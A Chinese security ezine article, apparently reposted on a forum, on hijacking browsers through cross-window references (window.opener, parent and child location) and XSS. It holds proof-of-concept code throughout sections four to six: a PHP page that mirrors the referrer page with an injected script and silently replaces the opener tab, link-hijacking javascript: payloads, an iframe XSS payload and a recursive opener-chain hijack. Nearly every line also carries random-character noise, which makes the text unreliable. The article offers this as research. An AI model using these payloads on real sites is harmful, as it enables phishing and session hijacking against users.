==Ph4nt0m Security Team==
: s; R7 \- I$ w. N6 \" D
0 M4 ?7 Y) Y% T4 o, \2 W Issue 0x03, Phile #0x05 of 0x07
0 E2 \: R& [' V5 S* O 4 h% O" o- z y. ~: l) @" j5 R
- \: }$ r/ T# Q. `9 R% h E|=---------------------------------------------------------------------------=|1 A" Y8 T5 `6 o/ E# {& Q
|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
$ w8 ?; A& [; c|=---------------------------------------------------------------------------=|
: W2 ?1 i2 n+ e3 n, a- X/ `- X|=---------------------------------------------------------------------------=|
4 F$ V9 K P7 k' L|=------------------------=[ By rayh4c ]=---------------------------=|" N- ?: p+ j( @) E! K( R
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
: `1 b: e& D0 {1 K' }|=---------------------------------------------------------------------------=|
$ S: W) e6 B2 u* U& e# ~
* f7 a# k* [; j0 @! n4 G) D1 y9 [/ B" X0 X9 m Z; k0 j( C
[目录]1 C/ b; H" O. `" ~
! i/ i9 N+ F3 q* o1. 前言
/ ?: l* y; x4 c7 D2. 同源策略简叙
; b$ \9 S |" E1 R9 P3. 理解window对象的同源策略
/ `$ k. c' U8 E( o$ l+ N: o4. 窗口引用功能中的同源策略漏洞
( p2 l% e) |" z& o 4.1 父窗口引用子窗口的同源策略问题
% s% X f6 X( r. [7 D 4.2 子窗口引用父窗口的同源策略问题9 L! ~2 W A4 o# j" e- W
5. 利用窗口引用漏洞劫持浏览器2 T1 G. b0 G' }* Y, o- x [# g
6. 利用XSS漏洞劫持浏览器( g" B3 B7 u* K9 _& k$ ]5 }
6.1 正向跨窗口劫持
7 L( I8 ~" a$ T% _ 6.2 反向跨窗口劫持5 ~6 |" \7 k4 o( i2 W
6.3 极度危险的跨框架窗口引用劫持# c" q ^. V1 S. [4 e7 }
6.4 极度危险的正反向跨窗口递归劫持! Z# V% W+ ]& d7 C7 w+ p, h9 ~
6.5 完全控制浏览器
; H6 q' X- U$ u- a# |/ _4 c ]7. 后记
& t- \ \* N9 J( o [8. 参考
( R9 e6 o. g: s/ X
6 c/ U: h: m9 |. U0 r' u
z0 u; W/ C9 m, O0 }$ B4 r一、前言0 f$ P0 T6 n) N; k4 @8 C
8 m, I4 [2 f1 k; [& e
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋
% X, q1 _# F1 |% h/ L# b友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session
2 ?% |' i2 y0 F1 e/ ~3 {劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被9 _. c! s4 r! x5 O. Z; L% L( C
条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。1 Y3 ?% J2 P( w! E" P, r/ D9 K4 }
! F% O h$ _% o& E
) C2 ~' D: I# [7 J" R2 j6 i
二、同源策略简叙
3 P+ ^* L* T$ w4 \ R
8 e' s, x |8 {9 B6 m' h: i7 |2 e8 N 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以9 F' O: n2 U6 H9 f/ b/ ~
从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都) [9 y0 g3 Y; O- s1 W- ?
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木
! [) X( g, j+ h( p, q马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个
2 L5 a4 _, C- s+ k漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。
8 s, W, j4 Q# |9 v8 F; F c2 V6 S6 m: t, {/ P8 |9 m
# a0 Q: q p2 r# B三、理解window对象的同源策略8 J# O, _* ^5 j
0 k! f0 Q* I# y0 d; G" Y) r 窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对
1 h8 J0 f5 S0 K3 Z& f& n象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:3 ^) C' D" m. {8 u
) f8 E! q4 t% T+ s |9 M+ I--code-------------------------------------------------------------------------
( L6 Y% A- c" x r8 P# ]<script language="javascript">4 E5 a8 _9 v% U7 R
for(p in window) document.write(p+"<br>");1 A9 h' s3 d, U# u
</script>: d' s) L; T: R4 B! T
-------------------------------------------------------------------------------
" m& h+ y+ ~% X
E, X) Y. Z) }* m0 W 这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方
0 ~+ ^& B. t, {' d' P; z3 u法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,7 p6 c# ~/ ]2 U' j5 L H& P4 \7 u0 G
这些属性和方法就必须遵循同源策略。7 H9 E8 P+ Q" D7 K
8 C, E* D. Z" _1 m 举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那
/ T3 J7 k7 M0 L8 |* a1 ?8 @么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须. [ ]/ S. @5 s1 o. V
的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这
: |1 v6 _2 y6 C' m2 ?9 ~" |5 }个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的2 w4 U) d" q/ B/ h
值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location
. n7 C% j _9 {属性并没有被拒绝访问。2 F& g3 V/ R1 r' Z: @
" P0 A8 h4 r/ k3 ?! U--demo.html--------------------------------------------------------------------
5 f( S0 Z* Q9 g! L3 T) P4 m; i% s<script language="javascript"> ' |- ~: E: H. {9 x9 G
function allPrpos(obj) {
+ Z, q. O7 Q; b4 p var props = "<table><tr><td>名称</td><td>值</td>";
. S" d5 U5 q' z0 V2 V8 ^ for(var p in obj){ % u: n5 D, ~1 I I' ] l
if(typeof(obj[p])=="function"){ " b+ ]8 f8 d0 d* e ?
obj[p]();
+ C* p$ |; R2 v! Z4 a' J }else{ % K0 U& P$ [% ]$ `6 b
try ' s p& L/ G# [6 H6 a( b, L2 g- R
{ , p; ^0 T. N6 u5 L
props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>"; ' G. C$ [) J8 u T- q$ ?4 x
}
+ Y- y$ I$ e% x. p2 Y& k1 k a catch (ex)
8 p/ M& ~; i$ p* O; ~. H& v {
. p8 H+ b" D( E$ t) X8 {& ^" @# B
4 [: H8 D: z) K props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>"; & Z& c9 w" @3 I. k
} # d7 I# P4 Z+ r& w
~1 g: B3 G+ j$ O! W" L1 f/ M8 I% c }
6 T4 e2 i: ~0 O6 \+ h } - @; w" W1 C# x
$ _4 s7 a! B" m document.write(props+"</table>");
# L b, A, ?; V5 m}
" R! s, D8 _5 y9 J. [: d3 g5 c 5 {5 A0 }: d5 X0 @; f
function createWin() {1 a$ H l1 x" |2 b
newWin = window.open ("http://www.google.com");
7 J, `( M% \( z2 S0 a( h+ H5 M setTimeout(function(){allPrpos(newWin)},2000);
& @1 O3 _9 _8 [0 S0 W} " E" w/ B' f1 ~3 \
0 l* M, h% J. p</script> " _6 P6 Y$ T& [* p4 V
5 e2 M6 ~( F% A<button onclick='createWin()'>创建一个非同源子窗口测试</button>5 Z+ Z" x/ f P" F. t; J5 z
-------------------------------------------------------------------------------: ]; g7 Z! W! V: R
# t5 v9 ?# Y/ I
& [% B g# K# F+ o9 O: m L四、窗口引用功能中的同源策略漏洞& P) a3 r; v# \! y) c) n3 O% {
2 J/ m- h; U8 c& J: @) f
4.1 父窗口引用子窗口的同源策略问题
5 C1 V" L8 E0 I* \5 u P9 ~# a) o8 S7 ^
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,1 r7 \% \1 i2 D2 V
但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道0 Q! p* X- K9 h; g6 ~
浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进
. s6 W3 [$ j( |7 \- i9 s# T行测试,会发现父窗口可以控制非同源子窗口location属性值。# R4 p6 C5 ~$ ]. S5 k) e/ d9 Z
" o4 R& m; B1 f2 q# {1 B--vul1.html--------------------------------------------------------------------/ ?( k/ ]/ Y) z9 _; P& S, j- }
<script language="javascript">
# C3 p* {" z+ ?7 v3 N# Ufunction createWin() { / {) ~( s; Q! D3 Z
newWin = window.open ("http://www.google.com");
2 q4 J3 v: O8 c! W1 O setTimeout(function(){newWin.location="http://www.80sec.com"},2000);
- K; A: p% o: p8 B* Z2 L} $ ^2 r4 b' k1 }- R
</script>
) D! i. k& ^6 J4 t G: |) {9 O! O2 R
<button onclick='createWin()'>创建一个非同源子窗口测试</button>
: X W2 N4 ]. |' N-------------------------------------------------------------------------------
* W+ j4 Q' N* u# o S X1 c' [3 k* b( k9 r; |. h3 z9 C; F
: J( k. Y3 D& G- p1 C4 f
4.2 子窗口引用父窗口的同源策略问题: b7 U6 ` W/ E t
- i/ V& e$ @% K) z; ^- x3 r
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使
: ^& |- E" [/ h用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们5 P9 k G8 Y' f: j5 ]) ~/ h. p
可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定+ o- Z7 c2 N: C0 E# A/ k$ y
会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。# Z/ Q0 k: o$ |
1 y* a: S0 K% Z `- n9 {
--code-------------------------------------------------------------------------# { ~, B& p- J
6 T: X5 `1 X) o/ S5 u0 ~# pjavascript:window.opener.location = "http://www.80sec.com";void(0);& z1 d6 c! f i# q, f
- g6 d; @1 b$ G/ Q# L- `
-------------------------------------------------------------------------------
, ] ~; T U+ o7 e1 l6 z7 g) S% a3 C3 e1 }" T7 k! E9 j) T
% {, O/ @1 ?1 d7 I
五、利用窗口引用漏洞劫持浏览器
: d$ J5 M6 c: W# c
) K; b7 W1 [0 ]0 i 经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子# |/ j' y2 {: H' |) a
窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那
" {3 G* X2 ^9 r( e% M( t h么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。! a, @4 @- ~& Y5 j( n# Y
- r) E& G1 ~' O0 J! r" j2 s1 t6 C
我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产
" j5 z! l) s# E) C9 D0 b生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或
2 @, e/ ~* |+ o ^者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接, R( o6 M' Y7 y+ L2 c' y" L
后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下
$ g. X8 F3 |& Z会产生什么可怕的后果。" ~* {( _9 H1 @: J5 Y( B
( J( b2 c, v. J" c% B9 m 下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我4 u' `' [+ \. |3 B
们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php, h( \+ L% R X% m8 k& _ A8 S
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时3 }% r( W/ L0 N, \# m1 s
候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可5 \9 B; e1 O) [+ b% p$ g# y! V
以做更多的事情,所有的一切仅仅是因为点击了一个链接。4 s* J, | l0 U( u& ^4 @
. |! e7 B8 V6 `. ^' s$ ^; Z
--hjk_ref.php------------------------------------------------------------------
. h3 V' L2 p3 |9 |/ z<?php
9 Q4 ]5 U4 d; V& Sif (array_key_exists("HTTP_REFERER", $_SERVER)) {9 B4 k7 w0 K1 U; |; Z, b
$Url_Mirror = $_SERVER["HTTP_REFERER"];
0 Y: P& C& J j5 l1 g: c" l' J}
- L8 C, X+ E' ~ Y6 o" e5 dif(isset ($_GET['ref'])) {( X+ ?2 G# M t; y5 u, [
echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';* {" x$ G6 ?2 v8 `
}7 V5 L' N( ^. y7 }$ |( O
?>9 E5 b- x3 |4 T% z6 e
& t6 G% f: O/ u# g3 W6 q
<script language="javascript">
3 Z3 a$ S5 p0 GsetTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000); * o- U( G' t' W: ? I0 A/ k P
</script>! g q9 K3 k9 p% ^$ m
-------------------------------------------------------------------------------
0 J+ v$ D7 M: T9 ]9 h. I" \$ U6 `& b/ b: Y0 P- d+ ^0 o' l
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。( \. s; j% E' @& I) h9 ~/ [9 d
) c/ Y2 {4 j- @: S# ~, y9 r5 D5 w
3 i9 M; O: B, O g+ U* Y6 l) l/ v
六、利用XSS漏洞劫持浏览器
# z8 x9 Y2 M- F6 G2 Y* G' l$ [& ~/ D9 X9 _, e; R
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为
7 q/ n( u9 c1 Q4 }7 I! ]) ?持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后/ t" R0 k% I. x! N
XSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起
6 Z7 f/ S; ~% A2 i讨论跨站师的终极技巧:- n! \: O7 @# u+ P2 V- }; V* P. e
1 f" F+ r: m ]. {& P7 ?" b5 {/ m7 ]8 j6 H" D) v4 {
6.1 正向跨窗口劫持
; l7 i: m* N" S$ q! z
3 N5 f' |8 A% \( S R# f4 y: s 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛) S& O, x/ ^$ Q j) d B! t
主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链
4 L) Q& q1 c7 I: y) @' |接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话
5 a3 g: a3 a* v8 y6 {框脚本。 9 c( K& S2 n. M' X5 H, U- U
, n6 ]* W* j0 p3 L' t w--hijack_open.js---------------------------------------------------------------' z1 i5 h& o5 x9 W
- U8 E |8 j$ r3 m1 e; V
javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);) \! ?# w! B$ s/ X
; c" o" a# K9 D3 x( L
-------------------------------------------------------------------------------
[4 w, X& c2 P# w5 t3 f
$ w. ?+ b6 m0 E$ ?" C
9 @# o7 }% C( r2 g# u6.2 反向跨窗口劫持0 z+ _- O+ B9 M1 ^- t3 U) P
5 g, k+ q) P- T" q2 ^9 y 同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代
2 B0 {8 P- v7 R1 `/ R( a码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
( i$ Z8 ~9 v$ Z6 t& M: C# d框脚本。1 v8 x$ C/ e4 _# x# j5 |# H
& O+ C; Q4 g+ I. U" Q& H; u
--hijack_opener.js-------------------------------------------------------------) I' Q: `# T# Y% @8 c* J
) ]& s) i, V) t1 L( {+ D0 }javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);
& n5 S2 E" o4 r0 J8 a7 U( i! W4 Q1 t2 U# Q" j
-------------------------------------------------------------------------------# u, m5 U$ I @3 h
" ?7 R+ n5 x! o0 A3 P# I4 _+ z
/ W2 c! ]" v, s6.3 极度危险的跨框架窗口引用劫持
* [+ l; i' f M# D
1 x2 d- N3 O- k5 X* N& y 非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞7 y+ M+ o) Y% M+ v6 S, j4 K
可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就- e8 a6 U) }/ |" @* U3 t
适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
7 _) s, I# }0 G8 h0 }8 }# o非持久型的XSS,如下:8 W: v# f+ `, ?3 y- }& g; b% N% e
3 o6 \) @0 h2 ?5 o6 U
<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>( K) G. D3 }& ^% \9 ^+ d: F
, M$ i, `7 z$ H
在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口
/ t! a3 o, r; |. @- m: C9 @3 i注入脚本。
4 }$ i4 }& Q; {6 m) Z
. q) W4 i- a: D4 k0 z. S. g--hijack_frame_opener.js-------------------------------------------------------1 d/ ~- \: |) s
<script>( ^; ~8 T3 _' {0 J: }, m& L6 D
window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";
! F! Q& |, G, S</script>3 ?3 z+ H @! x) @, @* |! D
-------------------------------------------------------------------------------
( o, z8 u; A. m" Z
3 {) G1 ~$ z# g! W( O
; L5 V0 m5 p3 E- \9 Z9 i9 g6.4 极度危险的正反向跨窗口递归劫持6 e! j, C7 ]0 F% ~% p; R2 M
( v! r2 \: A1 l' u( s
luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window
8 y: Q [1 R2 G: q的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过
+ M9 Z5 W5 A# D! V+ {9 b1 A2 B$ ?异常处理规避之间跨域页面的访问异常,代码如下:
6 J t+ c: ]0 ~2 `+ N1 Q4 s/ Z4 ^; k X0 l, N
--code-------------------------------------------------------------------------, Z1 V$ w) t2 y, H
. K+ `" _3 \2 U' C6 @
javascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);' {6 e$ Q- ~9 | E* c7 D5 P" S9 K
7 K8 Z1 q3 r- J- V3 z- ^-------------------------------------------------------------------------------/ D. t2 ~. E, h6 {2 f
. I0 y" O& d5 O$ m' H& W
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可1 B' y: D1 P+ M0 f
以劫持B域之前的A域页面,从而实现“隔空打击”。/ M0 Q! Y# n% w
$ w3 X" O8 P. `; Q 同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面
/ n } P7 Z0 o7 \' z执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
) S9 d0 j! y8 `; V$ z4 o
6 x g- S$ U1 L, I2 @1 m8 f$ d 结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。; w' ?& ?1 L; e/ D. U1 G, {
! W( i3 I) t8 A+ Z/ o+ c
. H: W2 L% q$ W0 z6.5 完全控制浏览器% M. H9 c' x: @' E# G- [/ W
- Z( x! T- n5 H5 m9 t/ d 一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则
1 k! h7 H! T9 b( o7 k+ i是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS
' y1 u" v1 ?4 y2 c( Q" s; {漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失: H: J/ f0 r2 _4 g! V- v9 l$ O
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再
r$ I' z2 B) C# P9 A8 d8 g O列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站0 v/ O% j6 d: E$ v3 C! X
师的终极目标 - 完全控制浏览器。8 @) a. L6 X( o
. C' W' L+ T6 \) n& v
- r$ Y8 I7 w( ?# g! d1 `! k
七、后记3 |' f9 ~9 N/ S; n- d5 D
% p* y; S& G0 A. e 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全! Y# o1 {+ m2 \. T+ ~2 b+ d
与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予
" ]. ]& S3 o% E7 u过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。
" [% |. Y& `" y! f% |4 I
2 k9 r9 O5 x# F/ E& r8 X+ L9 J# V" c) V3 E6 i+ ?. i
八、参考; p: m# n) L3 Y/ i0 h O
( d' b% c/ O; V: U& V( r2 l7 X( A1. http://en.wikipedia.org/wiki/Same_origin_policy N6 [/ l W! j7 S: s
2. http://code.google.com/p/browser ... licy_for_DOM_access
# u( ^2 w8 N8 q2 h9 R+ o. {3. http://www.w3.org/TR/Window/' O& f# \% }8 {* _2 g
4. http://www.80sec.com/release/browser-hijacking.txt
7 x' [; o( H4 \, Y/ G$ @7 v( u5. http://www.80sec.com/all-browser-security-alert.html
; _) ~9 U6 z: H/ E, P; Q6. http://www.80sec.com/ms08-058-attacks-google.html9 w H0 u3 Q% t5 j$ j
3 p' M' P" ^) s& O. I# s2 o) v-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对